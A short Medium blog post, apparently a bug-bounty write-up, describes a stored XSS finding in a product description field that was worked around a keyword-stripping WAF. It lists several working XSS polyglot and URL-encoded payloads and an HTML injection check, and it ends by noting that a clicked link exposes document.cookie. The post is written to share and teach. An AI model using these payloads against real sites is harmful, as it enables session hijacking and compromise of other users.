Stored XSS on Product Description [HIGH] — $400

Photo by Benny Samuel on Unsplash
  1. “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// — Polyglot Payload
  2. ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script><script>alert(1)</script>”><img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http://i.imgur.com/P8mL8.jpg"> — Polyglot Payload
  3. %7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e — URL Encoded
  4. ‘“><a href=’www.anything.com’>Click Here</a> — HTML Injection Check
  1. The web application is implementing WAF (Web Application Firewall)
  2. WAF is stripping sensitive keywords such as; ‘javascript’ and ‘alert’
  3. The product description uses Markdown to parse the user’s input
XSS and HTML Injection is Successful
Clicking the anchor tag would prompt the document.cookie

--

--

--

Cybersecurity enthusiast! Eager to learn and share personal experiences with all of you.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Size Matters— Software Technology

A Hard binary search problem

Chapter 2 — Type Casting in Swift (as, as?, as!)

Why Perimeter Security in Cloud is not as simple as it Sounds

How to Use Python for Artificial Intelligence: 7 Easy Ways

My Software Development Toolkit

Why Kanban Boards Are My Favorite

Why the idea of a scrum team is so powerful..

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Emanuel Beni Harijanto

Emanuel Beni Harijanto

Cybersecurity enthusiast! Eager to learn and share personal experiences with all of you.

More from Medium

SQL injection UNION attack to retrieve multiple values within a single column

A short story of IDOR for your perspective

XSS Vulnerability Part 2

Write-up: SQL injection UNION attack, determining the number of columns returned by the query @…